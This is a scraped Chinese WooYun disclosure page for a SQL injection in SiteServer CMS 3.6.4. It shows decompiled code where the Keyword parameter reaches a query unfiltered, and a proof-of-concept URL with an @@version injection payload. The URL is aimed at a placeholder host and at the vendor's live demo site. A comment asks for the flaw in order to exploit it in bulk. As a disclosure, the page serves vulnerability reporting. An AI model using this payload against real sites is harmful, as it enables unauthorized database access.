前往Shuct.Net首页

Shudepb PB反编译专家长时间以来,为业内同类软件事实上的唯一选择.细节,彰显专业.态度,决定品质.

关于反编译的搜索

siteserver最新版3.6.4 sql inject 第九蛋 | WooYun-2013-44055 | WooYun.org WooYun.org 登录 | 注册 首页 厂商列表 白帽子 团队 漏洞列表 提交漏洞 厂商活动 企业招聘 公告 当前位置:WooYun >> 漏洞信息 漏洞概要 关注数(6) 关注此漏洞 缺陷编号: WooYun-2013-44055 漏洞标题: siteserver最新版3.6.4 sql inject 第九蛋 相关厂商: 百容千域软件技术开发有限责任公司 漏洞作者: 小新 提交时间: 2013-11-25 23:11 公开时间: 2014-02-23 23:11 漏洞类型: SQL注射漏洞 危害等级: 中 自评Rank: 10 漏洞状态: 厂商已经确认 漏洞来源: http://www.wooyun.org Tags标签: .net代码审计 .net+sqlserver注射 白盒测试 0人收藏 收藏 分享漏洞: 漏洞详情 披露状态: 2013-11-25: 细节已通知厂商并且等待厂商处理中 2013-11-26: 厂商已经确认,细节仅向厂商公开 2013-11-29: 细节向第三方安全合作伙伴开放 2013-12-06: 细节向核心白帽子及相关领域专家公开 2013-12-16: 细节向普通白帽子公开 2014-01-05: 细节向实习白帽子公开 2014-02-23: 细节向公众公开 简要描述: siteserver 最新版3.6.4 存在注入, 第11个注入 详细说明: 第11个注入存在/UserCenter/cms/contents.aspx 用.NET Reflector 反编译UserCenter.Pages.dll这个文件 查看代码如下: Label_08D1: this.spContents.SelectCommand = UserDataProvider.UserDAO.GetSelectCommand(base.Request.QueryString["Keyword"], TranslateUtils.ToInt(base.Request.QueryString["CreateDate"]), TranslateUtils.ToInt(base.Request.QueryString["LastActivityDate"]), true, TranslateUtils.ToInt(base.Request.QueryString["TypeID"]), TranslateUtils.ToInt(base.Request.QueryString["DepartmentID"]), TranslateUtils.ToInt(base.Request.QueryString["AreaID"])); this.rptContents.ItemDataBound += new RepeaterItemEventHandler(this.x189b5ecd83f1b098); this.spContents.SortField = UserDataProvider.UserDAO.GetSortFieldName(); this.spContents.SortMode = SortMode.DESC; UserGroupInfo groupInfoByCredits = UserGroupManager.GetGroupInfoByCredits(0); Keyword 很明显的注入 漏洞证明: http://www.target.com/siteserver/cms/console_user.aspx?PageNum=0&Keyword=1'%20and%201=@@version%20and%201='1&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0 官网: http://2012.moban.siteserver.cn/siteserver/cms/console_user.aspx?PageNum=0&Keyword=1'%20and%201=@@version%20and%201='1&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0 修复方案: 对keyword进行过滤 小哥,rank 版权声明:转载请注明来源 小新@乌云 漏洞回应 厂商回应: 危害等级:中 漏洞Rank:6 确认时间:2013-11-26 11:38 厂商回复: 感谢提醒,我们将尽快修复 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评论 2013-11-29 14:44 | 挖掘鸡 ( 路人 | Rank:4 漏洞数:1 | 我爱挖掘鸡) 0 asus888@qq.com求此漏洞,我有正版的挖掘鸡,看此洞是否适合批量!合作分享,qq:2746-3108合作合作 1# 回复此人 登录后才能发表评论,请先 登录 。 Copyright © 2010 - 2013 wooyun.org, All Rights Reserved 吉ICP备12001400号-1 行业观点 · 法律顾问 · 联系我们 · 帮助 · 关于